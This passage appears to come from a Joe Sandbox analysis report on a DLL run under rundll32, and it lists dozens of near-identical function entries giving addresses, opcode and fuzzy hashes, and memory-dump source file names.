                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9903c5d687e99755333a16e3842c70d62c2bf20e09b3ed342849f778bd2a84c7
                                                                                                                                                                                                                            • Instruction ID: a0e7d7516605b19b3c4460fa0ed5b455bd1630c2e98f675a8919278c03ee4e1a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9903c5d687e99755333a16e3842c70d62c2bf20e09b3ed342849f778bd2a84c7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D231B4B2214B88D6EB618F29E4803AD77A0F79DB8CF248126EB4C4B751DF36C196C704
                                                                                                                                                                                                                            Function 000000018001E1D8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 666f94b4c324e89dde5076f12b2796057f566c1d694665cea945ec535cee8b7e
                                                                                                                                                                                                                            • Instruction ID: 820555eb4d0f59a8af78d18c402de02b7887c8458340afd7bc5ed6bb0949498a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 666f94b4c324e89dde5076f12b2796057f566c1d694665cea945ec535cee8b7e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42318F72604B88C6EB618F69E4503AD7BA4F39EF88F258126EB8C0B755CF36C156C704
                                                                                                                                                                                                                            Function 000000018001D260 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 2743813234ace51e2cd8399716c6b4a20169c06fb290832639c392eaf2108ed6
                                                                                                                                                                                                                            • Instruction ID: 6762067df6f94e64fbb26960150e01a3f70c2ced073885ae55eb72ef0073c814
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2743813234ace51e2cd8399716c6b4a20169c06fb290832639c392eaf2108ed6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2318672205B8886EB668F29E04039D7BA0E39DF8CF298116EB9C4B755CF36C556D704
                                                                                                                                                                                                                            Function 000000018001E2E0 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: aa95556cfa9ff7343852d3fbd6a8fe2e314ba3d8c4d9c429b78d81fee79ad27e
                                                                                                                                                                                                                            • Instruction ID: b6a78e4547598f4af4ade2d808d835414e3fe52b4da089028d378c4ab8a8e1ea
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa95556cfa9ff7343852d3fbd6a8fe2e314ba3d8c4d9c429b78d81fee79ad27e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED31A2B2204B88C6EB658F29D4543AD7BA0F39EB8CF658126EB5C4B751CF36C256C704
                                                                                                                                                                                                                            Function 000000018001D364 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f1493a1a2b18f05ffa665fd5f113c94d3442c92e7b3c4ec69f4248a91f1fc76d
                                                                                                                                                                                                                            • Instruction ID: d511901c3e1814b523fbfdca0846ae71778d4e38a41bd0adf3b841e160107951
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1493a1a2b18f05ffa665fd5f113c94d3442c92e7b3c4ec69f4248a91f1fc76d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5431A772205B8887DB618F29D05039D7BA0E39DB8CF258115EB8C4B751CF36C156C704
                                                                                                                                                                                                                            Function 000000018001E3E8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 0da7e9209479ef0cb63439bf8a2a90352237857cb9c3176e763d75088f004d9a
                                                                                                                                                                                                                            • Instruction ID: c4de805bf130f119a9c46255caf00cc08e0f3f438bdc203324da90fc7a29a961
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0da7e9209479ef0cb63439bf8a2a90352237857cb9c3176e763d75088f004d9a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C931A272204B88C6EBA18F29E0803AD77A0F39DB8CF248126EB4C4B751DF36C196C704
                                                                                                                                                                                                                            Function 000000018001F448 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 209c65b20986127f5aa7ef4e78147935c7281e5c1ac9cc21f36750b75af4c42c
                                                                                                                                                                                                                            • Instruction ID: e53c2ca3237e616d6738ded4af40069ecd060dc5feaf2dcb9113adf78b72288c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 209c65b20986127f5aa7ef4e78147935c7281e5c1ac9cc21f36750b75af4c42c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F3171B2204F8486EB618F29E0413AD7BA0F39DB8CF258125DB8D4B751DF36C196CB04
                                                                                                                                                                                                                            Function 000000018001D490 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 964ac4d9d946ed5031a175fde55a4e5d31fe4ae785e6d0907c27dff4c8104bc6
                                                                                                                                                                                                                            • Instruction ID: 13083c9b08479b9032403838b02ea23f80cb9391767459996849a1c10c8f1627
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 964ac4d9d946ed5031a175fde55a4e5d31fe4ae785e6d0907c27dff4c8104bc6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65317372204E98C6DB618F29E0803AD77A1F39DB8CF658126EB8D4B751CF36C596DB04
                                                                                                                                                                                                                            Function 000000018001E4F0 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c133b63652da1cf420c36a20650b5ec01119e36efb72f334426be63db447dc76
                                                                                                                                                                                                                            • Instruction ID: b0d2be95c531c237769cb58d520ad5a609acbc9b3344235a39323bf1ce76865d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c133b63652da1cf420c36a20650b5ec01119e36efb72f334426be63db447dc76
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4318272204E88C6EBA58F29D0403AD77A5F78DB8CF258126EB4C4B751DF36C156CB04
                                                                                                                                                                                                                            Function 000000018001C500 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: fa2804e2ce21936fa476a63feefa7bf225fd6756f1b24578f6d104b355285169
                                                                                                                                                                                                                            • Instruction ID: 1be2128548e799fb93561b0bd0fa12cd555e7fefaf183228d5433b3c84c98efa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa2804e2ce21936fa476a63feefa7bf225fd6756f1b24578f6d104b355285169
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3731A272204F9486EB658F29D0807AD7BA1F38DB8CF248125DB8D4B751CF36D196CB08
                                                                                                                                                                                                                            Function 000000018001F550 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: c5cc09f3bf1b6babf5b9921ceae1239727437c7e97d2e69c1cf620976b2fe177
                                                                                                                                                                                                                            • Instruction ID: 3b6d8f2da001674134de14be4aee3191b7e3a0ef31027dfae58e28e7b1608358
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5cc09f3bf1b6babf5b9921ceae1239727437c7e97d2e69c1cf620976b2fe177
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 303171B2205F8486EB618F29D0503AD7BA1F39DB8CF658125EB8C4B755CF36C156CB04
                                                                                                                                                                                                                            Function 000000018001D598 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 25dc5a82b19ba4570ad8ba2b998185a633847765e509a7592903ed30b47bbd4f
                                                                                                                                                                                                                            • Instruction ID: 5e9dbcad51623012c49ec541e5e600e97717bbe13490ada509c6461966da4e80
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25dc5a82b19ba4570ad8ba2b998185a633847765e509a7592903ed30b47bbd4f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED31A472204B88C6DB658F29D0503AD77A0F38CB8CF258126EB8C4B751CF36C196DB04
                                                                                                                                                                                                                            Function 000000018001C608 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 96553cdc00ba6ffdd888399b2e504edbde0e51b76a87d0906dfc329af91d93d8
                                                                                                                                                                                                                            • Instruction ID: 1179e2ff9a94c69d27a730f09aa2e6391bafaaffd20cd91d747c4df0c577e49f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96553cdc00ba6ffdd888399b2e504edbde0e51b76a87d0906dfc329af91d93d8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F031B4B2218B8486EB618F29D0507AD7BA0F39DB8CF249125EB8D4B751CF36C196CB04
                                                                                                                                                                                                                            Function 000000018001F658 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 6a8b025e400832db42c02f3a2f9e98f6ef4b0bf48f8fe73726e4d3bae0ec6bd4
                                                                                                                                                                                                                            • Instruction ID: b465ff9fe7c1c037843d6e02808f5b46d95adf2cfcd4fad86f46536aad94ae46
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a8b025e400832db42c02f3a2f9e98f6ef4b0bf48f8fe73726e4d3bae0ec6bd4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98316FB2204A8486EB618F29E0903AD77A0F79DB8CF258125EB8C4B761DF36C556C704
                                                                                                                                                                                                                            Function 000000018001E65C Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
